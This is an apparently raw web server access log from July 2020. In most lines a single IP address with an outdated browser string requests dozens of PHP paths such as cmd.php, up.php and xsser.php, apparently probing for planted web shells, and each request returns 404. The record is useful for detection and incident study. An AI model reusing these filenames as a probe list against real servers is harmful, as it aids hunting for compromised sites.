216.250.110.27 - - [05/Jul/2020:10:59:20 +0200] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:20 +0200] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:21 +0200] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:21 +0200] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:21 +0200] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:21 +0200] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:22 +0200] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:22 +0200] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:22 +0200] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:22 +0200] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:22 +0200] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:23 +0200] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:23 +0200] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:23 +0200] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
212.91.246.72 - - [05/Jul/2020:10:59:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.250.110.27 - - [05/Jul/2020:10:59:23 +0200] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:23 +0200] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:24 +0200] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:24 +0200] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:24 +0200] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:24 +0200] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:24 +0200] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:25 +0200] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:26 +0200] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:26 +0200] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:26 +0200] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:26 +0200] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
